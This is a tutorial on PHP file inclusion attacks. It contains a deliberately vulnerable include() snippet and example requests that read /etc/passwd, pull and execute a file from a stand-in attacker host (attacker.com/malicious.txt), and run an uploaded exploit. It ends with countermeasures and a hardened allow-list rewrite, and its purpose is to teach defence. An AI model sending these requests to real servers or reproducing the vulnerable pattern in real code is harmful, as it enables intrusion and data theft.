In a File Inclusion Attack, an attacker tricks a web server into executing certain scripts and including either a sensitive file from the server itself or a malicious file hosted remotely, with the purpose of performing further attacks.
File Inclusion Vulnerabilities occur mainly because of poor coding in web applications: if user-supplied input is used to build a file path without proper validation, this type of vulnerability results.
The purposes of this type of attack may include :
- Obtaining contents of sensitive files from a web server
- Execution of malicious code in the web server to perpetrate even more attacks
- Performing Cross Site Scripting Attack
- Performing Denial of Service or DoS attacks
- Stealing sensitive data from the web server
How is File Inclusion Attack perpetrated
There are mainly two types of File Inclusion Attacks :
- Local File Inclusion Attack
- Remote File Inclusion Attack
Local File Inclusion Attack :
In a Local File Inclusion Attack, the attacker tricks the web server into including a sensitive local file and revealing its contents to the attacker.
Let's consider the following piece of code :
<?php
// Deliberately vulnerable example: the request parameter is used
// directly to build the path passed to include().
if ( isset( $_GET['EYES'] ) ) {
    include( $_GET['EYES'] . '.php' );
}
?>
<form method="get">
<select name="EYES">
<option value="black">Black</option>
<option value="blue">Blue</option>
</select>
<input type="submit">
</form>
Here, if the attacker requests /eyes.php?EYES=/etc/passwd, the server will include the file /etc/passwd and the attacker can read its contents. This may lead to theft of sensitive data or to further attacks later. This is a typical example of a Local File Inclusion Attack.
Remote File Inclusion Attack :
If we consider the same piece of code shown above, the attacker may send the following requests to perform a Remote File Inclusion or RFI Attack.
- /eyes.php?EYES=http://attacker.com/malicious.txt? : This causes the web server to include and execute a malicious file hosted on the attacker's server.
- /eyes.php?EYES=C:\\ftp\\upload\\exploit : This executes code from an already uploaded malicious file 'exploit', which may lead to the spread of malware or other attacks.
Countermeasures for File Inclusion Attacks
We can follow some coding practices which reduce the incidence of File Inclusion Attacks to a large extent.
- When a passed-in path is included, make sure it does not contain unintended character patterns.
- Instead of dynamically generating the path from the URL or form parameter, you can use a predefined switch/case statement to determine which file should be included.
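As an added example (not code from the original post), here is the eyes.php snippet rewritten with the predefined switch/case approach recommended above: the request parameter only selects an entry from a fixed allow-list and is never concatenated into a path, so values such as /etc/passwd or http://attacker.com/malicious.txt? are rejected outright. The template file names black.php and blue.php are assumed for the example.

```php
<?php
// Hardened version of the eyes.php example (added example, not from the post).
// The user-supplied value is only ever compared against fixed literals;
// the string itself never reaches include().

/**
 * Map the EYES request parameter to an allow-listed template file name.
 * Returns null for anything outside the allow-list: absolute paths,
 * URLs, traversal sequences, or a non-string value such as EYES[]=x.
 */
function resolveEyeTemplate($selection): ?string
{
    if (!is_string($selection)) {
        return null;                 // missing parameter or an array value
    }
    switch ($selection) {            // fixed, predefined cases only
        case 'black':
            return 'black.php';      // assumed template file name
        case 'blue':
            return 'blue.php';       // assumed template file name
        default:
            return null;             // e.g. '/etc/passwd', 'http://...', '../..'
    }
}

$template = resolveEyeTemplate($_GET['EYES'] ?? null);

if ($template === null) {
    // Reject rather than "clean up" the value, and log it: repeated
    // rejections with path- or URL-like values are a useful detection signal.
    error_log('eyes.php: rejected EYES parameter: '
        . var_export($_GET['EYES'] ?? null, true));
    http_response_code(400);
    exit('Invalid selection');
}

// Only one of the fixed names above can reach this point, and the
// directory is pinned to the script's own directory.
include __DIR__ . '/' . $template;
?>
<form method="get">
    <select name="EYES">
        <option value="black">Black</option>
        <option value="blue">Blue</option>
    </select>
    <input type="submit">
</form>
```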
So, follow some simple rules and safeguard your web applications from File Inclusion Attacks.